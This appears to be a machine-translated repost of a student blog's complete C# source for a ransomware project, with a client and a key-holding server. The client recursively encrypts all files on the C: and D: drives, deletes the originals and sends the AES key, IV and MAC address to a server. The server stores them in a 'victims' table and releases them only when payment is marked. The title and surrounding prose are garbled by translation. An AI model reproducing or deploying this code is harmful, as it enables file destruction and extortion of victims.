[国稿計画]ローカルエリアネットワークソフトウェア完全コード
GitHub: https://github.com/benkerry/gukwon-ransomware
# Utils.cs
namespace Utils
{
public struct KeySet
{
public byte[] Key;
public byte[] IV;
}
public static class ArrayAppender
{
public static void Append<T>(ref T[] a, T[] b)
{
T[] result = new T[a.Length + b.Length];
for(int i = 0; i < a.Length; i++)
{
result[i] = a[i];
}
for(int i = a.Length; i < a.Length + b.Length; i++)
{
result[i] = b[i - a.Length];
}
a = result;
}
public static void Append<T>(ref T[] a, T b)
{
T[] result = new T[a.Length + 1];
for(int i = 0; i < a.Length; i++)
{
result[i] = a[i];
}
result[a.Length] = b;
a = result;
}
}
public static class CONSTANTS
{
public static int FAIL = 0x00;
public static int SUCCESS = 0x01;
public static int SEND_KEY = 0x02;
public static int DECRYPT_REQ = 0x03;
}
}
ArrayAppender Static Classは、2つのアレイ# (Client) FilePathGetter.cs
using System.IO;
using Utils;
namespace gukwon_ransomeware_client
{
public class FilePathGetter
{
private string[] allFilePathes;
public FilePathGetter()
{
allFilePathes = new string[0];
}
public string[] GetAllFilePathes(string[] dirPathes)
{
for (int i = 0; i < dirPathes.Length; i++)
{
if(Directory.Exists(dirPathes[i]))
GetAllFilePathes(new DirectoryInfo(dirPathes[i]));
}
return allFilePathes;
}
private void GetAllFilePathes(DirectoryInfo dirInfo)
{
FileInfo[] files = dirInfo.GetFiles();
DirectoryInfo[] dirs = dirInfo.GetDirectories();
string[] pathes = new string[files.Length];
if (dirInfo.FullName.ToUpper().Contains("SYSTEM"))
return;
for (int i = 0; i < files.Length; i++)
{
pathes[i] = files[i].FullName;
}
ArrayAppender.Append(ref allFilePathes, pathes);
for(int i = 0; i < dirs.Length; i++)
{
GetAllFilePathes(dirs[i]);
}
}
}
}
各# (Client) Encryptor.cs
using System.IO;
using System.Security.Cryptography;
namespace gukwon_ransomeware_client
{
public class Encryptor
{
private RijndaelManaged aes;
public Utils.KeySet keySet;
public Encryptor()
{
aes = new RijndaelManaged();
aes.KeySize = 256;
aes.BlockSize = 128;
aes.Padding = PaddingMode.PKCS7;
aes.Mode = CipherMode.CBC;
aes.GenerateKey();
aes.GenerateIV();
}
public Utils.KeySet EncryptFiles(string[] pathes)
{
int count;
int blockSizeBytes = aes.BlockSize / 8;
byte[] data = new byte[blockSizeBytes];
Utils.KeySet keySet;
FileStream inFs;
FileStream outFs;
CryptoStream cryptoStream;
for (int i = 0; i < pathes.Length; i++)
{
if (File.Exists(pathes[i]))
{
inFs = new FileStream(pathes[i], FileMode.Open);
outFs = new FileStream(pathes[i] + ".encrypted", FileMode.Create);
cryptoStream = new CryptoStream(outFs, aes.CreateEncryptor(), CryptoStreamMode.Write);
do
{
count = inFs.Read(data, 0, blockSizeBytes);
cryptoStream.Write(data, 0, count);
}
while (count > 0);
inFs.Close();
cryptoStream.FlushFinalBlock();
cryptoStream.Close();
outFs.Close();
File.Delete(pathes[i]);
}
}
keySet.Key = aes.Key;
keySet.IV = aes.IV;
return keySet;
}
}
}
# (Client) Decryptor.cs
using System.IO;
using System.Security.Cryptography;
namespace gukwon_ransomeware_client
{
public class Decryptor
{
private RijndaelManaged aes;
public Decryptor(byte[] Key, byte[] IV)
{
aes = new RijndaelManaged();
aes.KeySize = 256;
aes.BlockSize = 128;
aes.Padding = PaddingMode.PKCS7;
aes.Mode = CipherMode.CBC;
aes.Key = Key;
aes.IV = IV;
}
public void DecryptFiles(string[] pathes)
{
int count;
int blockSizeBytes = aes.BlockSize / 8;
byte[] data = new byte[blockSizeBytes];
FileStream inFs;
FileStream outFs;
CryptoStream cryptoStream;
for (int i = 0; i < pathes.Length; i++)
{
if (File.Exists(pathes[i] + ".encrypted"))
{
inFs = new FileStream(pathes[i] + ".encrypted", FileMode.Open);
outFs = new FileStream(pathes[i], FileMode.Create);
cryptoStream = new CryptoStream(outFs, aes.CreateDecryptor(), CryptoStreamMode.Write);
do
{
count = inFs.Read(data, 0, blockSizeBytes);
cryptoStream.Write(data, 0, count);
}
while (count > 0);
inFs.Close();
cryptoStream.FlushFinalBlock();
cryptoStream.Close();
outFs.Close();
File.Delete(pathes[i] + ".encrypted");
}
}
}
}
}
# (Client) Program.cs
using System;
using System.IO;
using System.Timers;
using System.Net.Sockets;
using System.Net.NetworkInformation;
using Utils;
namespace gukwon_ransomeware_client
{
class Program
{
static string[] pathes = new string[0];
static void Elapsed(object src, ElapsedEventArgs e)
{
string base64_key = null, base64_iv = null;
TcpClient client = new TcpClient("localhost", 4444);
NetworkStream stream = client.GetStream();
BinaryWriter wtr = new BinaryWriter(stream);
BinaryReader rdr = new BinaryReader(stream);
Decryptor decryptor;
wtr.Write(CONSTANTS.DECRYPT_REQ);
wtr.Write(NetworkInterface.GetAllNetworkInterfaces()[0].GetPhysicalAddress().ToString());
wtr.Close();
switch (rdr.ReadInt32())
{
case 0x00:
base64_key = rdr.ReadString();
base64_iv = rdr.ReadString();
break;
case 0x01:
rdr.Close();
wtr.Close();
stream.Close();
client.Close();
return;
}
decryptor = new Decryptor(Convert.FromBase64String(base64_key), Convert.FromBase64String(base64_iv));
decryptor.DecryptFiles(pathes);
rdr.Close();
wtr.Close();
stream.Close();
client.Close();
}
static void Main()
{
Timer timer = new Timer(1000 * 60 * 5);
Console.WriteLine("실행 중 종료시 파일들이 손상될 수 있습니다. . .");
if (File.Exists("data.dat"))
{
BinaryReader rdr = new BinaryReader(new FileStream("data.dat", FileMode.Open));
pathes = new string[rdr.ReadInt32()];
for (int i = 0; i < pathes.Length; i++)
{
pathes[i] = rdr.ReadString();
}
rdr.Close();
}
else
{
KeySet keySet;
string macaddr, base64_key, base64_iv;
BinaryWriter wtr;
FilePathGetter pathGetter = new FilePathGetter();
Encryptor encryptor = new Encryptor();
TcpClient client;
NetworkStream stream;
if (Directory.Exists("C:\\"))
{
pathes = pathGetter.GetAllFilePathes(new string[1] { "C:\\" });
}
if (Directory.Exists("D:\\"))
{
ArrayAppender.Append(ref pathes, pathGetter.GetAllFilePathes(new string[1] { "D:\\" }));
}
keySet = encryptor.EncryptFiles(pathes);
wtr = new BinaryWriter(new FileStream("data.dat", FileMode.Create));
wtr.Write(pathes.Length);
for (int i = 0; i < pathes.Length; i++)
{
wtr.Write(pathes[i]);
}
wtr.Close();
macaddr = NetworkInterface.GetAllNetworkInterfaces()[0].GetPhysicalAddress().ToString();
base64_key = Convert.ToBase64String(keySet.Key);
base64_iv = Convert.ToBase64String(keySet.IV);
client = new TcpClient("localhost", 4444);
stream = client.GetStream();
wtr = new BinaryWriter(stream);
wtr.Write(CONSTANTS.SEND_KEY);
wtr.Write(macaddr);
wtr.Write(base64_key);
wtr.Write(base64_iv);
wtr.Close();
stream.Close();
client.Close();
}
timer.Elapsed += Elapsed;
timer.Start();
}
}
}
# (Server) Program.cs
using System.IO;
using System.Net;
using System.Net.Sockets;
using Utils;
using MySql.Data.MySqlClient;
namespace gukwon_ransomware_server
{
class Program
{
static void Main()
{
int mode;
string macaddr, base64_key, base64_iv;
TcpListener server = new TcpListener(IPAddress.Any, 4444);
TcpClient client;
NetworkStream netStream;
BinaryReader rdr;
BinaryWriter wtr;
MySqlConnection conn;
MySqlCommand cmd;
MySqlDataReader sqlrdr;
server.Start();
while (true)
{
client = server.AcceptTcpClient();
conn = new MySqlConnection("Server=localhost;Database=gukwon_ransomware;Uid=root;Pwd=test;");
conn.Open();
netStream = client.GetStream();
rdr = new BinaryReader(netStream);
mode = rdr.ReadInt32();
macaddr = rdr.ReadString();
if (mode == CONSTANTS.SEND_KEY)
{
base64_key = rdr.ReadString();
base64_iv = rdr.ReadString();
cmd = new MySqlCommand(string.Format("INSERT INTO victims(mac_addr, keystring, ivstring) VALUES(\"{0}\", \"{1}\", \"{2}\";", macaddr, base64_key, base64_iv));
cmd.ExecuteNonQuery();
conn.Close();
cmd.Dispose();
rdr.Close();
netStream.Close();
client.Close();
}
else
{
cmd = new MySqlCommand(string.Format("SELECT keystring, ivstring FROM victims WHERE macaddr=\"{0}\" AND satisfied = 1"));
sqlrdr = cmd.ExecuteReader();
if (sqlrdr.HasRows)
{
rdr.Close();
sqlrdr.Read();
wtr = new BinaryWriter(netStream);
wtr.Write(CONSTANTS.SUCCESS);
wtr.Write(sqlrdr["keystring"].ToString());
wtr.Write(sqlrdr["ivstring"].ToString());
wtr.Close();
conn.Close();
cmd.Dispose();
netStream.Close();
client.Close();
}
else
{
wtr = new BinaryWriter(netStream);
wtr.Write(CONSTANTS.FAIL);
wtr.Close();
conn.Close();
cmd.Dispose();
rdr.Close();
netStream.Close();
client.Close();
}
}
}
}
}
}
Reference
この問題について([国稿計画]ローカルエリアネットワークソフトウェア完全コード), 我々は、より多くの情報をここで見つけました https://velog.io/@developerkerry/국원고-프로젝트-랜섬웨어-전체-코드テキストは自由に共有またはコピーできます。ただし、このドキュメントのURLは参考URLとして残しておいてください。
Collection and Share based on the CC Protocol